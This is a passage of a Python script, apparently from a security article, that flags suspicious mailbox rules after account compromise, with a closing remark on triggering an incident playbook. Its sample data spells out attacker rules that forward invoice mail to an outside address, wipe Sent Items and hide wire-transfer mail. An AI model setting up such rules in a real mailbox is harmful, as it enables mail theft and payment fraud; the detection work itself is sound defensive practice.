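CORPORATE_DOMAIN = "example.com"  # assumption: the organisation's own mail domain
# Subject keywords that usually mark finance-department mail worth protecting.
SENSITIVE_KEYWORDS = ("invoice", "payment", "purchase order", "wire", "bank")


@dataclass
class InboxRule:
    """One mailbox rule, in a hypothetical normalised form (not a vendor schema)."""
    mailbox: str
    name: str
    applies_to_folder: str = "Inbox"
    subject_contains: List[str] = field(default_factory=list)
    forward_to: List[str] = field(default_factory=list)
    move_to_folder: Optional[str] = None
    mark_read: bool = False
    delete: bool = False


@dataclass
class Finding:
    mailbox: str
    rule: str
    severity: str
    reason: str


def _is_external(address: str) -> bool:
    """True when the address is outside the corporate domain (case-insensitive)."""
    domain = address.rsplit("@", 1)[-1].lower()
    return domain != CORPORATE_DOMAIN


def _touches_sensitive_mail(rule: InboxRule) -> bool:
    """True when the rule's subject condition matches financial keywords."""
    words = [w.lower() for w in rule.subject_contains]
    return any(k in w for w in words for k in SENSITIVE_KEYWORDS)


def analyze_rule(rule: InboxRule) -> List[Finding]:
    """Return zero or more findings for a single rule."""
    findings: List[Finding] = []
    sensitive = _touches_sensitive_mail(rule)
    external = [a for a in rule.forward_to if _is_external(a)]
    if external:  # classic BEC: silently copy the victim's mail out of the org
        findings.append(Finding(rule.mailbox, rule.name, "high",
                                "auto-forwards to external address(es): " + ", ".join(external)))
    if rule.delete and rule.applies_to_folder.lower() == "sent items":
        # removes the trace of messages sent by whoever controls the account
        findings.append(Finding(rule.mailbox, rule.name, "high",
                                "deletes mail from Sent Items, hiding messages sent from the account"))
    elif rule.delete and sensitive:
        findings.append(Finding(rule.mailbox, rule.name, "high",
                                "deletes messages matching financial keywords before the user sees them"))
    if rule.move_to_folder and rule.mark_read:
        # move + mark-as-read keeps replies (e.g. a bank querying a transfer) out of sight
        findings.append(Finding(rule.mailbox, rule.name, "high" if sensitive else "medium",
                                f"moves messages to '{rule.move_to_folder}' and marks them read"))
    return findings


def analyze_rules(rules: List[InboxRule]) -> List[Finding]:
    """Analyse every exported rule and return all findings in input order."""
    return [f for r in rules for f in analyze_rule(r)]


# Constructed sample export: three tampered rules, one merely sloppy, two benign.
SAMPLE_RULES = [
    InboxRule("ap@example.com", "Forward invoices",
              subject_contains=["invoice"], forward_to=["ap.backup@freemail.example"]),
    InboxRule("cfo@example.com", "Clean up", applies_to_folder="Sent Items", delete=True),
    InboxRule("ap@example.com", "Quiet wires",
              subject_contains=["wire"], move_to_folder="RSS Subscriptions", mark_read=True),
    InboxRule("hr@example.com", "Newsletters",
              subject_contains=["newsletter"], move_to_folder="Newsletters"),
    InboxRule("ap@example.com", "Team copy", forward_to=["ap-team@example.com"]),
    InboxRule("it@example.com", "Tidy", move_to_folder="Archive", mark_read=True),
]

if __name__ == "__main__":
    for f in analyze_rules(SAMPLE_RULES):
        print(f"[{f.severity.upper():6}] {f.mailbox} / {f.rule}: {f.reason}")
```

Run against a real export, a new external-forward or Sent Items deletion rule on a finance mailbox is the signal to trigger the account-takeover playbook from the article's contingency planning step.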